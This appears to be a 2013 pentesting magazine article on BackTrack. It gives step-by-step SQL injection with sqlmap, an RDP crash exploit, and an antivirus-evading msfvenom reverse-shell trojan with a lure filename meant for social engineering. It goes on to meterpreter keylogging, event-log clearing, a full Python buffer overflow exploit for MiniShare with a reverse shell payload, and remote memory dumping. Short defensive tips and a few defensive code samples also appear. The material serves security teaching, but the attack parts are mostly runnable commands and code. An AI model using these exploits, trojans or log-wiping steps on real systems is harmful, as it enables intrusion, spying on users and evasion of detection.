
SQL injection is a code injection technique that exploits a security vulnerability in an application's software. SQL injection is mostly known as an attack vector against websites, but it can be used to attack any type of SQL database. If you would like to know more about SQL injection, read this great website: http://www.unixwiz.net/techtips/sql-injection.html.

Figure 23. Vulnerability on Joomla


sqlmap is an automatic SQL injection and database takeover tool, and it is included in the latest version of BackTrack. In this section we analyze a vulnerable PHP script: we use sqlmap and extract database information.

• Download the sample website (index.php and db.sql); it is vulnerable to SQL injection.
• To install the sample, we simply put index.php in our localhost directory and create a new database named sql_injection. Then, we import the db.sql file into the database.
• When everything is OK, we open a browser and verify that the site is up (see Figure 24).

Where:
• corresponds to the Apache server IP address;
• /testsql corresponds to the path where we put the website (index.php);
• name=ben is the first GET argument used in the MySQL query and corresponds to the user name;
• password= is the second GET argument used in the MySQL query.

Now, we start sqlmap from the BackTrack menu (see Figure 25). Then we run the command pictured in Figure 26. After a few minutes, sqlmap reports a vulnerability in the parameter name and displays all the databases (see Figures 27, 28). Now we can execute the SQL injection. To perform this exploit, execute the following command (see Figure 29):

python ./sqlmap.py -u sql/index.php?name=ben -D sql_injection -T user --columns

Where:
• -D sql_injection corresponds to the database named sql_injection created in step 2;
• -T user is used to select the table user in the sql_injection database;
• --columns is the argument used to list the columns of the table.

• sqlmap reveals 3 columns: id, name and password (see Figure 30). Now, we execute a query to get the password simply from a username (see Figures 31, 32).

How to protect against SQL Injection?

The best technique to prevent SQL injection is to protect your MySQL queries with mysql_real_escape_string() or to use the PDO library (http://).

Figure 26. Run SQLMAP
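As an added illustration of the fix recommended above (not code from the article), the following Python example uses sqlite3 in place of the article's PHP/MySQL script, with a constructed user table of the same shape (id, name, password). The first function pastes the GET values into the query text the way a vulnerable index.php does; the second binds them as parameters, which is what a PDO prepared statement does.

```python
import sqlite3

# Constructed table of the same shape as the article's sample site: user(id, name, password).
# The password column is plain text only because the sample site stores it that way.
SAMPLE_USERS = [("ben", "s3cret"), ("alice", "hunter2")]


def build_sample_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO user (name, password) VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def vulnerable_login(conn, name, password):
    """The flaw sqlmap finds in the 'name' parameter: the GET values are pasted
    into the SQL text, so a quote in either of them rewrites the query."""
    sql = ("SELECT id, name FROM user WHERE name = '" + name +
           "' AND password = '" + password + "'")
    return conn.execute(sql).fetchall()


def safe_login(conn, name, password):
    """Parameterised query, the sqlite3 counterpart of a PDO prepared statement:
    the values are bound by the driver and are never parsed as SQL."""
    sql = "SELECT id, name FROM user WHERE name = ? AND password = ?"
    return conn.execute(sql, (name, password)).fetchall()


if __name__ == "__main__":
    conn = build_sample_db()
    probe = "ben' -- "          # a quote and a comment marker in the name argument
    print("vulnerable:", vulnerable_login(conn, probe, "wrong password"))
    print("safe:      ", safe_login(conn, probe, "wrong password"))
```

With the same input, the concatenated query returns ben's row although the password is wrong, while the parameterised query returns nothing.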

Figure 24. SQL Injection

Figure 27. SQL vulnerabilities

Figure 25. SQLMAP

Figure 28. SQL vulnerabilities

Figure 29. SQLMAP command sample

Figure 30. SQL Map results

Vulnerabilities exploit on Win7

In this case study, we will learn how to penetrate Microsoft Windows 7. Nowadays, companies are still struggling to recognize the overwhelming benefits of the latest Microsoft release. Indeed, a worldwide migration leads to considerable direct investments, licenses and long-term commitments. Considering these well-known facts, we will base our experiments on Windows 7 instead of Windows 8. To perform this case study, we will use the Metasploit framework. Metasploit is the perfect toolkit for pentesting.

What you will learn:
• How to use Nessus and Metasploit;
• A DoS exploit on Windows 7;
• How to create a Trojan for Windows 7.

Now, we will focus on Nessus. It is a vulnerability scanner that lets you scan a network and discover flaws in the operating system, its services and their misconfiguration. Even if some packages are provided by BackTrack, you need to download the latest version of Nessus:
• In the terminal, write apt-get install nessus;
• Then, you must activate your Nessus version following this link: products/nessus/nessus-homefeed;
• You will receive your key by email. Copy this key and write the command below: /opt/nessus/bin/nessus-fetch --register xxxxxxxx-xxxx-xxxx-xxxx where xxxx represents the key. If everything is OK, you'll see this message: 'Your activation code has been registered properly – thank you';
• After that, you need to create a user for Nessus: /opt/nessus/sbin/nessus-adduser;
• Choose a login and password, and say yes when Nessus asks you whether you want to create an 'admin' user (see Figure 33);
• Finally, you need to start the Nessus daemon by entering /etc/init.d/nessusd start;
• Nessus gives you the opportunity to use a GUI in a web browser. Run Firefox and go to https://localhost:8834/. The connection requires https because all the communication is encrypted using SSL/TLS.

Now everything is set up to have some pentest fun on Windows 7.

Figure 31. SQLMAP dump command

Figure 32. SQLMAP Dump results

Figure 33. Run nessus as Admin

Exploit 1: DoS on Windows 7

For this first exploit, we want to create a denial of service on a remote host. A DoS happens when a malicious intruder wants to stop a specific process (or all processes) on a remote computer or server. This type of attack can target email services or websites, and is performed by flooding or by exploiting a flaw in a program or service. In our case, we will crash the remote computer by exploiting a flaw in the Remote Desktop Protocol. RDP is very useful to take control of a user session remotely. For instance, an administrator can help a user solve a problem, or you can help your mother set up her new printer. By default, RDP uses port 3389. Since we have a fresh Windows 7 installation, the first thing to do is to activate this service. This is very easy: click the Start button, right-click on Computer, then Properties. In the left panel, click Remote Settings and then select the radio button 'Allow connections from computers running any version of Remote Desktop'. This exploit doesn't work against the third option, because it uses NLA authentication mode, which is more secure than the second one. Before we start, let's take a look at our roadmap. First, we will perform a kind of pre-attack by scanning our entire network to see which hosts are connected. Then, we will choose a target and find a flaw using Nessus, and then we will be able to crash the system using the Metasploit framework. Nmap is a tool designed to scan a range of addresses or a specific target. We want to discover whether there are any Windows hosts on our network. To discover all the hosts on this network, type nmap -sP (see Figure 34). The -sP parameter means that we only want to show live hosts.

There are some hosts connected to the network, but no Windows 7. However, there are a few unknown hosts, so we can gather more information about them by writing nmap -O ip_address, where ip_address represents the IP of the target to scan. Let's try with nmap -O (see Figure 35). The result indicates that a Windows 7 machine is online on the network! Moreover, nmap has detected some open ports. It's important to know whether there is a possible way to hack our Windows. Here comes Nessus. Once you are logged in, we create a new scan (under the Scans tab, clicking the Add button). We name our scan 'Win7 Scan' and set the policy to 'Internal Network Scan'. In the 'Scan targets' box, you can choose a range of IP addresses (for example ), but we want to target a specific host, so we use the one provided by nmap: (see Figure 36). Launch the scan. After a while, you will see the results (see Figure 37). According to the scan, there are two potential high threats for our Windows. Let's go deeper. By clicking the first result (SVC Name msrdp on port 3389), you'll learn a lot about this vulnerability, for instance a description, the solution to protect against it if the flaw is exploitable, and the Common Vulnerabilities and Exposures ID (CVE). The Metasploit website provides a database of auxiliary and exploit modules (www.metasploit.com/modules/). By entering the right CVE (CVE-2012-0002 in our case) in the field, we discover that there are exploits for this kind of vulnerability. By clicking the link 'MS12-020 Microsoft Remote Desktop', Metasploit gives you all the information to exploit this vulnerability (see Figure 38). Now it's time to attack our Windows. On BT5, the first thing to do is to launch msfconsole. It's a popular interface to Metasploit. It provides an 'all-in-console' experience and gives you access to a wide range of options. Run msfconsole. An msf prompt will appear. Then, we must select the right module. According to the Metasploit website, we will use ms12_020_maxchannelids (see Figure 39):

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

Figure 34. nmap's results

Figure 35. Nmap's results

Figure 36. Nessus GUI

Figure 37. Nessus results

If you type show options, you'll see all the requirements needed by the module to perform the attack. You need to set RHOST to the remote host, our Windows 7. Write set RHOST on the console. The show options command confirms that the target is correctly set (see Figure 40). Everything we need for this penetration is OK, so the last thing to do is to launch the exploit! In the BackTrack 5 terminal, just write exploit and watch the result on your Windows machine! As you can see, Windows has just crashed (see Figure 41)! BackTrack 5 shows us that the module has worked successfully (our target seems down) (see Figure 42)!

When you want to discover flaws on a remote system, repeat these three steps – very efficient and pretty easy.

Figure 38. Search for exploit

Figure 39. Use auxiliary command

Figure 40. Show option command

Figure 41. Windows 7 Crash

Figure 42. Module Execution complete

Exploit 2: Creation of a Trojan to get access to a remote computer

The first exploit was fun, but now we want complete access to the remote host! In this scenario, we will use social engineering to send a malicious program to a user running Windows 7. Here's the roadmap of our experiment: first, we will use msfvenom to create the payload to send to the target; second, we will create a handler to await a possible response from our target; finally, we will perform some actions on the remote host.

Step 1: Generation of the payload

We will use msfvenom, which is a combination of msfpayload and msfencode. msfpayload is a tool specially designed to generate all the shellcode available in Metasploit. msfencode is a little tool that helps with encoding. We will use a reflective DLL injection: it's a technique employed to load a library into a host process, here over TCP. TCP belongs to the Internet protocol suite and provides a reliable, error-controlled connection between two hosts. In the BackTrack terminal, write msfvenom -p windows/meterpreter/reverse_tcp -o to view all the options you need to fill in to generate the Trojan (see Figure 43). You need to provide some information such as your local IP address (LHOST). If you can't remember it, type ifconfig in the terminal. In my case, it's . We will also change the listening port (LPORT) to 443, because a firewall or a router is more likely to accept this kind of stream. To generate and output the malicious file, write this command:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST= LPORT=443 -f exe > hot_girls_screensaver.exe

Here are some explanations:
• -e x86/shikata_ga_nai is an encoder which performs some permutation and substitution on the block in order to bypass a spam filter or an antivirus;
• -i 5 encodes the content of the payload 5 times;
• -b '\x00' avoids this character (NULL) in the payload, in order to avoid a premature end of the code;
• -f exe means that the output format will be an executable file;
• hot_girls_screensaver.exe is the name of the output (we decided to choose an attractive filename to get a better result; see Figure 44).

Now, with this executable you can gain access to a remote computer through the reverse connection! If you list the directory (ls), you will see our Trojan. Then, you must send this exe to your Windows 7. In real life, to perform such a thing, you'll probably need to use some social engineering tricks to get a user to download your Trojan. But don't forget that's illegal.

Step 2: Wait for a remote execution of the payload

In BT5, you must use the generic payload handler. This module lets you use all the features of a payload launched outside the framework. Write use exploit/multi/handler and, according to our purpose, set a reverse_tcp payload. It's necessary to execute the commands below (see Figure 45):

set payload windows/meterpreter/reverse_tcp
show options

As shown in the screenshot, we need to configure the local host and the local port:

set LHOST
set LPORT 443

Figure 43. msfvenom command

Then we can run the reverse handler by typing exploit (see Figure 46). Now, Metasploit is waiting for an incoming connection from a potential victim. In real life, you don’t know when a potential user will execute the malicious file, so be patient!

Figure 44. msfvenom results

Figure 46. Executing the reverse handler

Figure 45. PayLoad configuration

Figure 47. Trojan execution results

Step 3: Execute the Trojan

It's time to double-click the exe file on our Windows 7 (see Figure 47). Once the remote user launches the payload, a meterpreter prompt appears; that means you have complete access to the remote host! Meterpreter provides some powerful tools for executing remote code. When you hit the help key, all the activities you are able to perform are listed. First of all, we must know who is running our payload. Thus, we enter the command sysinfo (see Figure 48). As we can see in the screenshot, all the information about the remote host is displayed! Let's go further and see how many processes are running on the remote host. Type ps (see Figure 49). You will see the entire process list. Now the user probably thinks that your screensaver doesn't work. If he is skilled, he will probably want to kill the Trojan's process. To stay connected, a smart thing to do is to migrate our meterpreter session to another process. We will choose explorer.exe because it's a generic process managing the Windows GUI. To do this, locate the process identifier (PID) of explorer.exe and type migrate pid_number, where pid_number represents the PID on the remote host (see Figure 50). In our case, the PID is 908. The user can kill the process hot_girls_screensaver.exe; it's no big deal because we are now running our session inside explorer.exe! Moreover, if the user didn't kill the process, do it yourself. Again, locate the PID of hot_girls_screensaver.exe using ps. Then execute

kill pid_hot_girls_screensaver

where pid_hot_girls_screensaver represents the PID of this process. As you can see, you are still connected! Now focus on the user: we can see what he is doing by writing the command screenshot, or how long he has been idle by typing idletime. If the user is active, it will be interesting to know what he is typing. To perform such a thing, we must launch the meterpreter keylogger by entering the keyscan_start command (see Figure 51). All the keys pressed will be recorded and, if we want to read what the remote user is typing, we need to run the keyscan_dump command (see Figure 52). To stop the keylogger, run keyscan_stop. The shell command gives you access to a remote Windows prompt (see Figure 53). Our attack must be secret, so in order to stay undetected, we must type clearev. The entire event list that we generated during our intrusion will disappear from the Windows event log.

How to protect against these?

As you can see, these attacks are really easy to do. Concerning the RDP exploit, if you use RDP at home or at work, try to use NLA authentication mode because it's more secure. Network Level Authentication uses the user's credentials and provides accountability: you know who is doing what and in which circumstances. Moreover, according to Microsoft's TechNet website, NLA requires fewer resources on the remote computer during the challenge than the other method. It can help reduce the risk of a DoS attack. Don't forget to update your OS when a new update is available. The best mode is to turn on automatic updates. This link gives you all the steps to configure this: thanks.aspx?ln=en&&thankspage=5

Figure 48. Meterpreter terminal

Figure 49. Remote system running processes

Figure 50. Migrate pid_number

Figure 51. keyscan command

Figure 52. keyscan_dump command

Figure 53. Access to the remote prompt

Concerning the Trojan, the best practice is to educate your mates and colleagues. In effect, the whole security of a system or network depends on the weakest element of the chain. Most of the time, the problem is located between the keyboard and the chair! It's also important to install an antivirus on the computer and keep it up-to-date. Microsoft provides Windows Defender, but there is a lot of good software on the market – for instance Avast. But in my opinion – and I insist – you really need to talk about this subject around you. Hackers and the antivirus industry are waging a war with no mercy. It's like a cat-and-mouse game, and an antivirus works in reactive mode: that means the software contains a database of the well-known vulnerabilities (signatures) and can't fight software, code, viruses, etc. that it doesn't recognize.

Buffer Overflow

In this section, we will learn about an exploit based on buffer overflow techniques. A buffer overflow may occur when a program attempts to store more data in memory than the buffer can actually hold. Buffers are created to hold a fixed amount of data and will corrupt or overwrite adjacent buffers when overflowed. Even though a buffer overflow can appear while programming, in this section we will exploit a poorly programmed program by overflowing its buffer with executable code of our choice.

What you will learn:
• To detect an overflow possibility in a program;
• To build a Python script that triggers a buffer overflow;
• To exploit the buffer overflow with a payload.

The target system is a Windows XP SP2 with:
• OllyDbg (http://mathieu-nayrolles/pentestmag/victim/ ). OllyDbg is an assembler-level analyzing debugger for Windows XP. We will use this software to detect buffer overflow possibilities.
• MiniShare (http://mathieu-nayrolles/pentestmag/victim/ ). MiniShare is a free web server for Windows XP to share files.
• IP: 

The attacker system is BackTrack 5 R3 with:
• Perl interpreter;
• Python interpreter;
• Metasploit 3.x;
• IP: 

Detect buffer overflow possibility

On the victim system:
• Launch OllyDbg and then File > Open > MiniShare.exe (the default installation path is C:\Program Files\MiniShare\MiniShare.exe; see Figure 54).

Figure 54. OllyDBG GUI

Figure 55. Find a JMP ESP operation

The interface is organized as follows:
• Upper-left: CPU view;
• Lower-left: Memory dump;
• Upper-right: Registers;
• Lower-right: Stack.

Now, you can hit F9 to let MiniShare run.
• In the View menu select 'Executable modules', then select Shell32 at the bottom of the list and press Enter. You can now search for a JMP ESP operation using [CTRL+F]. A JMP ESP operation jumps to the address held in ESP (see Figure 55). Since we will have to use this address in a Python script that we will build later, we want to avoid any special character such as \x00 (zero byte), \x0a (line feed) and \x0d (carriage return). Use CTRL+L to continue your search for the perfect JMP ESP operation. In my case, I found the holy grail at 7CA58265.

Create a buffer overflow targeting MiniShare

A known vulnerability of MiniShare (that can be found at ) lets the sender overflow the vulnerable server with a simple HTTP GET looking like:
GET HTTP/1.1 \r\n\r\n

The 'only' thing we have to do is to send enough content in this GET to reach the targeted, vulnerable address.

• In your BackTrack system, create a new Python script containing the lines presented in Listing 2.

Listing 2. Python script

#!/usr/bin/python
import socket

MyTarget = ""   # IP address of the MiniShare server
Port = 80
# "GET " followed by 2220 'A' bytes (\x41) and the end of the request line
MyBuffer = "GET " + "\x41" * 2220 + " HTTP/1.1\r\n\r\n"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((MyTarget, Port))
sock.send(MyBuffer)
sock.close()

• Make this script executable (chmod +x) and run it.
• You have successfully crashed your distant MiniShare server. To confirm it, have a look at your OllyDbg. The EIP register should be overwritten with 41414141 (see Figure 56). The instruction pointer (EIP) register contains the address of the next instruction to be executed. So, we successfully made the next address to be executed 41414141 by sending an HTTP GET with 2200 * 41. However, we still don't know which of the '41's are in EIP. We have to generate a pattern to identify how much data we need to send.
• In your BackTrack system, go to /pentest/exploits/framework/tools and run the following command: ./pattern_create.rb 2220 and copy-paste the output into your Python script (see Listing 3).

Listing 3. Python script sending the output of ./pattern_create.rb 2220

#!/usr/bin/python
import socket

MyTarget = ""   # IP address of the MiniShare server
Port = 80
MyBuffer = "GET "
MyBuffer += ('Result OF ./pattern_create.rb 2220')   # paste the generated pattern here
MyBuffer += " HTTP/1.1\r\n\r\n"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((MyTarget, Port))
sock.send(MyBuffer)
sock.close()

• Restart the program on the victim system (CTRL+F2; F9) and run your Python script again. The result of this operation is a new crash of MiniShare, but with more information. Indeed, the crash occurs at another address and the ESP value is now Ch7Ch8… (see Figure 57).
• Using the pattern offset tool, we can retrieve how many characters there are between the violation address and our Ch7Ch8… sequence. Use the commands:

./pattern_offset.rb 36684335 (result is 1787)
./pattern_offset.rb Ch7Ch8 (result is 1791)

• Using this new information, we can modify our Python script as shown in Listing 4.

Listing 4. Python script modified

#!/usr/bin/python
import socket

MyTarget = ""   # IP address of the MiniShare server
Port = 80
MyBuffer = "GET "
MyBuffer += "\x41\x41\x41\x41"                 # the new EIP value
MyBuffer += "\x90" * (1791 - len(MyBuffer))     # padding up to the ESP offset
MyBuffer += "\xcc" * (2220 - len(MyBuffer))     # the new ESP value
MyBuffer += " HTTP/1.1\r\n\r\n"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((MyTarget, Port))
sock.send(MyBuffer)
sock.close()

• Restart MiniShare on the victim system (CTRL+F2; F9) and launch your Python script. If everything went well, we now have the EIP value at CCCCCC (see Figure 58).

Figure 56. EIP overwritten to 41414141

Figure 57. ESP overwritten to Ch7Ch...

Figure 58. Confirm the buffer overflow

Exploiting the buffer overflow flaw

We now have all the information required to exploit a buffer overflow:
• A vulnerable address: 7CA58265;
• The amount of data to send in the HTTP GET to overwrite EIP.

The next step is to generate executable code to inject into the victim system (instead of CCCCCCC).
• Using the msfpayload tool, we can generate code to gain remote console access to the target: msfpayload windows/shell_reverse_tcp LHOST= LPORT=443 R | msfencode -a x86 -b '\x00\x0a\x0d' -t c
• Modify your Python script as shown in Listing 5.
• Start listening on port 443 by executing: sudo nc -nvvlp 443. Then restart MiniShare for the last time and run your script (see Figure 59).

How to protect against a Buffer Overflow attack?

The first step to immunize your system against being overflowed is to patch the software you are using to the latest version. Moreover, you should regularly check whether there are new entries concerning the software you use on websites like Exploit-DB. If you suspect such attacks are being conducted on your network, use a network analysis tool such as Wireshark to confirm the presence of suspicious packets and identify the source.
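The Wireshark check suggested above can be automated. The following Python example (added here; it is not part of the article) inspects captured HTTP request lines and flags the traits of the MiniShare request built earlier: an oversized request-URI, a long run of one repeated byte, or non-printable bytes. The thresholds MAX_URI_LEN and MAX_SAME_BYTE_RUN are assumptions to tune per server, and the sample requests are constructed.

```python
import re

# Constructed sample requests, modelled on the MiniShare case above: one
# ordinary GET and one whose request-URI is a 2220-byte run of 'A' (\x41).
SAMPLE_REQUESTS = [
    b"GET /index.html HTTP/1.1\r\nHost: fileserver\r\n\r\n",
    b"GET " + b"\x41" * 2220 + b" HTTP/1.1\r\n\r\n",
]

MAX_URI_LEN = 1024        # assumed threshold; tune to the URLs the server really serves
MAX_SAME_BYTE_RUN = 64    # a long run of one byte is typical of filler or a NOP sled


def inspect_request(raw):
    """Return the reasons why one raw HTTP request looks like an overflow
    attempt; an empty list means nothing suspicious was found."""
    reasons = []
    request_line = raw.split(b"\r\n", 1)[0]
    parts = request_line.split(b" ")
    if len(parts) != 3:
        return ["malformed request line"]
    _method, uri, _version = parts
    if len(uri) > MAX_URI_LEN:
        reasons.append("request-URI length %d exceeds %d" % (len(uri), MAX_URI_LEN))
    # Longest run of a single repeated byte inside the request-URI.
    longest = max((len(m.group(0)) for m in re.finditer(rb"(.)\1*", uri, re.S)),
                  default=0)
    if longest > MAX_SAME_BYTE_RUN:
        reasons.append("run of %d identical bytes in request-URI" % longest)
    # Bytes outside printable ASCII never belong in a legitimate URI.
    if any(b < 0x20 or b > 0x7e for b in uri):
        reasons.append("non-printable bytes in request-URI")
    return reasons


def scan_requests(requests):
    """Map the index of every flagged request to its list of reasons."""
    findings = {}
    for index, raw in enumerate(requests):
        reasons = inspect_request(raw)
        if reasons:
            findings[index] = reasons
    return findings


if __name__ == "__main__":
    for index, reasons in scan_requests(SAMPLE_REQUESTS).items():
        print("request %d: %s" % (index, "; ".join(reasons)))
```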

Dump memory

In this last section, we will learn how to dump the memory of a distant machine and analyze it. This very simple process is able to reconstruct files that were held in the distant memory, such as images, audio or private .ssh keys.

What you will learn:
• To dump the memory of a remote machine;
• To analyze the memory dump to retrieve information.

To follow this step-by-step tutorial, you will have to successfully complete the Buffer Overflow attack. Indeed, we will use the remote control provided by this attack as a sound basis for what follows.

The target system is a Windows XP SP2 with:
• MoonSols Windows Memory Toolkit (http://mathieu-nayrolles/pentestmag/victim/ ). The MoonSols Windows Memory Toolkit is designed to extract various memory dumps, such as VMware memory snapshots, Microsoft crash dumps, and even the current memory of a target machine.
• IP: 

The attacker system is BackTrack 5 R3 with:
• Foremost (sudo apt-get install foremost). Foremost is a console program to recover files based on their headers, footers, and internal data structures. Foremost was originally used by the Air Force Office of Special Investigations before being released to the public.
• IP: 
Listing 5. Final form of the Python script

#!/usr/bin/python
import socket

MyTarget = ""   # IP address of the MiniShare server
Port = 80
MyBuffer = "GET "
MyBuffer += "\x65\x82\xA5\x7C"                 # the address 7CA58265, written in reverse (little-endian) order
MyBuffer += "\x90" * (1791 - len(MyBuffer))     # padding up to the ESP offset
MyBuffer += ('MY PAYLOAD COMMAND RESULT')      # paste the msfpayload | msfencode output here
MyBuffer += " HTTP/1.1\r\n\r\n"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((MyTarget, Port))
sock.send(MyBuffer)
sock.close()

Install MoonSols on the remote host
• Re-run your Python script from the previous chapter to get remote access to the victim system (see Figure 60).
• In this step we create a shared folder, copy the executable into it, dump the memory into it and download the resulting file. Of course, this method of installing MoonSols (the memory dump software) and downloading the results is not optimal: creating a shared folder will certainly not go unnoticed, and you need access to the local network. Enter the following commands:
• mkdir pentestMag (creates a folder);
• net share pentest=c:\PenTestMag /unlimited (creates a shared folder named 'pentest');
• cacls c:\pentestMag /t /e /g Everyone:f (gives full control over this folder to everyone).
You can now access the remote shared folder using BackTrack's network browsing and copy the unzipped MoonSols into it. You can now run MoonSols to dump the memory:
win32dd -d /f C:\pentestMag\dump.dmp

Figure 59. Remote Prompt access
OPEN 06/2013

Figure 60. Remote Prompt access

The resulting file will be the size of the physical memory, so pay attention to the free space on the remote hard drive.
• Run Foremost (sudo apt-get install foremost) on the .dmp file:
foremost -t all dump.dmp
• Browse the results in the newly created output folder (see Figure 61). By browsing this folder's contents, you can retrieve any files that were present in the remote system's memory.
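Foremost's header/footer carving over the dump, as an added example that is not code from the article or from Foremost: a small Python carver with three signatures (JPEG, PNG, PEM private key) run over a constructed stand-in for dump.dmp, including the case where a footer never appears because the rest of the file was paged out. The signature table and the sample dump are assumptions for illustration.

```python
# Minimal Foremost-style carver: find header/footer pairs in a raw memory image.

# Signature table: (header, footer, max_len). The PNG footer is the IEND chunk with
# its fixed CRC; for PEM blocks the footer is the matching "-----END " line.
SIGNATURES = {
    "jpg": (b"\xff\xd8\xff", b"\xff\xd9", 20 * 1024 * 1024),
    "png": (b"\x89PNG\r\n\x1a\n", b"IEND\xaeB`\x82", 20 * 1024 * 1024),
    "pem": (b"-----BEGIN ", b"-----END ", 16 * 1024),
}


def carve(dump, signatures=SIGNATURES):
    """Return carved regions as dicts sorted by offset.

    A header with no footer inside max_len is still reported (Foremost would write
    up to max_len bytes); it is marked complete=False so the analyst knows the file
    was paged out or overwritten before the footer."""
    regions = []
    for kind, (header, footer, max_len) in signatures.items():
        pos = 0
        while True:
            hpos = dump.find(header, pos)
            if hpos == -1:
                break
            window_end = min(len(dump), hpos + max_len)
            fpos = dump.find(footer, hpos + len(header), window_end)
            if fpos == -1:
                regions.append({"type": kind, "offset": hpos,
                                "length": window_end - hpos, "complete": False})
                pos = hpos + len(header)
                continue
            end = fpos + len(footer)
            if kind == "pem":
                # Take the whole END line so the carved block is a loadable PEM file.
                nl = dump.find(b"\n", end)
                end = len(dump) if nl == -1 else nl + 1
            regions.append({"type": kind, "offset": hpos,
                            "length": end - hpos, "complete": True})
            pos = end
    return sorted(regions, key=lambda r: r["offset"])


def extract(dump, region):
    """Slice the carved bytes out of the dump (what Foremost writes to its output folder)."""
    return dump[region["offset"]:region["offset"] + region["length"]]


def build_sample_dump():
    """Constructed stand-in for dump.dmp: filler bytes with three artefacts embedded.

    The filler cycles through 0x00..0xFF, so it never contains any of the headers."""
    filler = bytes(range(256)) * 8          # 2 KiB
    jpeg = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x11" * 40 + b"\xff\xd9"
    pem = (b"-----BEGIN RSA PRIVATE KEY-----\n"
           + b"MIIBOgIBAAJBAK" + b"A" * 50 + b"\n"
           + b"-----END RSA PRIVATE KEY-----\n")          # constructed, not a real key
    png_truncated = b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR" + b"\x00" * 17   # no IEND
    return filler + jpeg + filler + pem + filler + png_truncated + filler


if __name__ == "__main__":
    dump = build_sample_dump()
    for r in carve(dump):
        print(r["type"], r["offset"], r["length"],
              "complete" if r["complete"] else "truncated")
```

A private key that carves out of the dump this way is exactly the exposure the protection advice at the end of this section is about: whatever the process holds in clear in RAM is recoverable by anyone who can acquire the memory.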

How to protect against a memory dump operation?

To protect yourself from a memory dump, you basically have to protect against remote access, as described in the previous parts.

With 'Pentesting with BackTrack', you are all set to complete various non-trivial and complex tasks to optimize and protect your infrastructure. Indeed, during this short journey, you have been led through the pentesting world by step-by-step tutorials and hands-on recipes. We have provided examples of attacks, and ways to protect against them, on all current hot topics such as: Wi-Fi, Bluetooth, CMS, Windows XP, Windows 7, Trojans, buffer overflows, and memory forensics. Moreover, you have now learned the tools that can help you reproduce attacks while testing your infrastructure's resistance. This work does not claim to be the state of the art in penetration testing with BackTrack, but it provides a sound basis for anyone who wants to make the leap towards a more secure environment. The authors would like to give you their heartfelt thanks for reading this article and hope there are fewer flaws to exploit out there.

Figure 61. Output Folder

Mathieu Nayrolles

Mathieu was born in France, and it is where he started his studies in Computing Sciences at Exia.Cesi and passed the Diploma in Information Systems Management. He travelled to Europe and completed various internships for companies worldwide, such as Eurocopter and Saint-Gobain. During the fourth year, he decided to pursue a double diploma course at UQAM, Québec, Canada. In the framework of his study at UQAM, he was awarded for one of his publications ('Specification and Detection of SOA Antipatterns') at the 10th International Conference on Service-Oriented Computing. He is still completing his last year in both schools, and has written two Master's theses in the Artificial Intelligence and Quality fields. Currently, he is giving courses on agile development, service-oriented architectures, business intelligence, and data mining at the bachelor level at UQAM and eXia.Cesi, along with his own studies. You can find out more about him on his website,

Mathieu Schmitt

Mathieu is currently working toward the MS degree from the University of Quebec at Montreal. His current research interests include data security in cloud computing, privacy preserving, and network security. He also has a Master's in networking and system administration. He likes spending hours on /r/lolcats and having some fun time drinking beers with friends. You can find out more about him on his website,

Benoît Delorme

Benoît was born in France, where he graduated at Exia with an emphasis on Networking and System Administration in Nancy. He now lives in Montreal, Quebec, where he's following courses to obtain a Master's degree from the University of Quebec in Montreal. His working fields are multi-factor security authentication like fingerprints and facial recognition, and at the same time he is giving courses on security for embedded devices in his spare time. He likes IT security in general, web development, particularly UX-wise, project management, his Nexus 4 phone, and preparing great meals. You can follow him on Google+



Multiphase Penetration Testing
Using BackTrack Linux, Metasploit, and Armitage

Article comes from Pen Test Extra. Download the complete issue.

The EC Council identifies five stages of attack that are common to cyber penetration. [1] These stages of attack may be used to categorize incidences where a network or host has been compromised. Considering that these stages are common to real attacks, they are used by ethical hackers to conduct penetration testing. An ethical hacker, or white-hat hacker, may use these steps in order or may selectively choose the steps that work best for their particular vulnerability. [2]
When a penetration tester begins to examine a target, they often enter the first phase of attack, the reconnaissance phase. In this first phase of attack, the attacker or tester tries to discover as much information about the victim as possible. In some cases this phase may involve choosing a target, if there is no specific target given. (Penetration testers are often given a target, whereas attackers must decide on one.) [5] This phase may involve using search engines or other internet-based utilities to learn about the target. [1] After a target has been chosen, the tester must attempt to enumerate the target as much as possible. This enumeration is referred to by the EC Council as the scanning phase. [1] While enumeration does occur to some extent in the reconnaissance phase, it is in the scanning phase that enumeration occurs the most. The tester will try to uncover detailed information about services by viewing the banners presented when ports are sent requests. [4] This phase may also involve scanning a large target to identify a smaller subset of vulnerable nodes. [8] After the tester has enumerated targets in the scanning phase, they begin to plan and perform the third phase, the gaining access phase. [1] In the gaining access phase the tester will plan a strategy to attack targets and compromise confidentiality and integrity. The tester will need to confirm the level of overtness they are comfortable with; based on this level of comfort the tester will begin to attack the vulnerable nodes and services. This phase is considered complete when the tester has a foothold in the target. [1] The tester may choose to segment this phase into a second part where the tester spreads and expands the foothold; alternatively the tester could complete all phases and begin again in order to expand the foothold. After establishing an initial foothold in the victim, the tester must aim to maintain that access for a long-term compromise. In a real-world compromise the attacker is aiming to dig in and capture data that crosses through the victim; maintaining access is the phase where the tester solidifies their grip on the target. [12] In this phase the tester brings tools into the victim and sets up backdoor services that the tester can use to bypass authentication mechanisms. The tester's primary goal in this phase is to make it easier to access the victim, and also to make access seem more legitimate by adding valid credentials and impersonating legitimate usage. [4] In the final, fifth phase the tester works to cover up the evidence that a vulnerability has been exploited and an attacker gained access. [1] There are several motivations for ensuring that this phase is accomplished correctly. In a real attack scenario the attacker will wish to destroy evidence to avoid being detected and, if detected, to avoid prosecution. [4] The tester will delete logs and try to manipulate detection methods so they do not report the compromise. The EC Council refers to the final phase of the multiphase attack as the covering tracks phase. [1]

Metasploit, Armitage, and BackTrack

